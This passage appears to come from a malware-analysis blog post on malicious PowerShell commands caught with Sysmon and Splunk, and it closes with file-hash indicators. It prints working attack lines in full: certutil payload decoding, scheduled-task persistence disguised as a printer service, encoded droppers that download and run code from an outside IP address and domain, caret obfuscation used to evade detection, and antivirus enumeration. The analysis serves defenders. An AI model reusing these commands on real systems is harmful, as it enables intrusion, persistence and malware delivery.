CIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwAMQAiACAALwBYAE0ATAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQAMQAuAHgAbQBsACIAKQAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwBjAHIAZQBhAHQAZQAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAAyACIAIAAvAFgATQBMACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAAyAC4AeABtAGwAIgApAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAGMAcgBlAGEAdABlACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADMAIgAgAC8AWABNAEwAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADMALgB4AG0AbAAiACkACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AYwByAGUAYQB0AGUAIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwANAAiACAALwBYAE0ATAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQANAAuAHgAbQBsACIAKQAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwBjAHIAZQBhAHQAZQAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAA1ACIAIAAvAFgATQBMACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAA1AC4AeABtAGwAIgApAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAHIAdQBuACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADEAIgAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwByAHUAbgAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAAyACIACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AcgB1AG4AIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwAMwAiAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAHIAdQBuACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADQAIgAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwByAHUAbgAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAA1ACIACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAAqAC4AeABtAGwAIgApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUA
Following command, use the 'certutil' to create a binary file which it is later executed, as showed below:
$loot = ($env:LOCALAPPDATA + "\dyna\"); md $loot
certutil -decode res.crt ($loot + "res"); certutil -decode kl.crt ($loot + "kl.exe"); certutil -decode st.crt ($loot + "st.exe"); certutil -decode cry.crt ($loot + "cry.exe"); certutil -decode t1.crt ($env:TEMP + "\t1.xml"); certutil -decode t2.crt ($env:TEMP + "\t2.xml"); certutil -decode t3.crt ($env:TEMP + "\t3.xml"); certutil -decode t4.crt ($env:TEMP + "\t4.xml"); certutil -decode t5.crt ($env:TEMP + "\t5.xml"); certutil -decode bd.crt C:\ProgramData\bd.exe
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\1" /XML ($env:TEMP + "\t1.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\2" /XML ($env:TEMP + "\t2.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\3" /XML ($env:TEMP + "\t3.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\4" /XML ($env:TEMP + "\t4.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\5" /XML ($env:TEMP + "\t5.xml")
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\1"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\2"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\3"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\4"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\5"
Remove-Item ..
"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwBhADMAZgA1ADcAM.....CQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=
Next one in the list is quite interesting as well. It uses some of the functions in in .NET framework to load additional code.
$x='a3f57212-1462-4ae7-8745-5e178820d04c';$y='Z:\tmp\0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4.exe';try {
if ([Environment]::Version.Major -ge 4)
{ $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)}
. ([_32._88]::_74($x))
exit $LASTEXITCODE
}
catch [NotSupportedException]
{
Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red
}
catch {
Write-Host ("Error: " + $_.Exception.Message) -Fore Red
}
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAcwBUAGUATQAuAE4AZQB0AC4AUwBFAFIAdgBpAEMAZQBQAG8AaQBOAHQATQBBAE4AQQBHAEUAUgBdADoAOgBFAHgAUABFAEMAdAAxADAAMABDAG8ATgB0AGkATgB1AEUAIAA9ACAAMAA7ACQAdwBDAD0ATgBlAHcALQBPAGIASgBlAEMAdAAgAFMAWQBzAHQARQBtAC4ATgBlAFQALgBXAGUAYgBDAGwAaQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBTAFQAZQBNAC4ATgBlAFQALgBXAGUAYgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQARQBmAEEAVQBsAHQAVwBFAEIAUAByAE8AWABZADsAJABXAGMALgBQAFIATwBYAHkALgBDAHIARQBEAGUAbgBUAGkAQQBMAFMAIAA9ACAAWwBTAHkAcwB0AEUAbQAuAE4ARQB0AC4AQwBSAEUAZABFAG4AVABJAEEATABDAEEAYwBoAEUAXQA6ADoARABlAEYAQQB1AGwAVABOAGUAdAB3AG8AUgBLAEMAUgBlAGQARQBuAHQASQBBAGwAUwA7ACQASwA9ACcAdQApADEALAB5ACgAbQBqAGYAYQAqAEUANQAjADIATABPADMAfQA5AGgANgBjAC0AegBJAHgAXQBpAG8AawAlACcAOwAkAGkAPQAwADsAWwBjAGgAQQBSAFsAXQBdACQAQgA9ACgAWwBDAEgAQQByAFsAXQBdACgAJAB3AGMALgBEAG8AdwBOAEwAbwBBAEQAUwB0AFIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMwA4AC4AMQAwADAALgAxADYAMwAuADMAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABPAHIAJABrAFsAJABJACsAKwAlACQAawAuAEwAZQBuAEcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBuACcAJwApAA==
Last encoded command is basically a dropper. A normal User-Agent is defined to avoid detection
[SYsTeM.Net.SERviCePoiNtMANAGER]::ExPECt100CoNtiNuE = 0;$wC=New-ObJeCt SYstEm.NeT.WebCliENt;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeADeRs.AdD('User-Agent',$u);$wC.PrOxy =
[SySTeM.NeT.WebRequESt]::DEfAUltWEBPrOXY;$Wc.PROXy.CrEDenTiALS = [SystEm.NEt.CREdEnTIALCAchE]::DeFAulTNetwoRKCRedEntIAlS;$K='u)1,y(mjfa*E5#2LO3}9h6c-zIx]iok%';$i=0;[chAR[]]$B=([CHAr[]]
($wc.DowNLoADStRing("http://38.100.163.39:8080/index.asp")))|%{$_-BXOr$k[$I++%$k.LenGTH]};IEX ($B-join''
powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
This PowerShell command acts as dropper. It is interesting to check the ParentProcessCommand as it using the character "^" to avoid detection,
"C:\Windows\System32\cmd.exe" /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
The last command detects if there is Antivirus/Antispyware installed and running
powershell.exe -inputformat none -NoProfile -NoLogo -Command "& {$avlist = @(); $os = Get-WmiObject Win32_OperatingSystem; if ($os.ProductType -eq 3) {Write-Host \"ServerOS|0\";} elseif ($os.Version -like \"5.*\") {Get-WmiObject -Namespace root\SecurityCenter -Class AntiVirusProduct | ForEach-Object {Write-Host \"$($_.displayName)|$(if ($_.onAccessScanningEnabled) {\"4096\"} else {\"0\"})\"};} else {Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiSpywareProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};} Write-Host ($avlist -join \"*\")}"
As showed, PowerShell can be abused in many different ways through the different phases of an intrusion, therefore it is very important to monitor suspicious PowerShell commands, and Sysmonitor+Splunk can really help on this purpose.
Indicators:
a64b9215aff8a71333e9a5df5cd3b371b6b0a6d6a44604a93f0ba928c4f60d8d
91746786d3db211a33bfb851029cb3b42224cbc1d01f8b45d8ab4d6ef872ab81
9d3b4f233a61322d9738700f9e42b729a160fe651167e8454a25fbc74e4cf9ef
573301614d192de0ac34754e73c9f4ad036db318326421b66eb9fb394c7d3298
0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4
64aac1af18109e6661fb86a52c4024f81ef761818651897cde47eb71d8825de9
6d57ecd0b30fd27b793120ba16c208e58a986961fa0afc9c603b06b9ef66f7d9
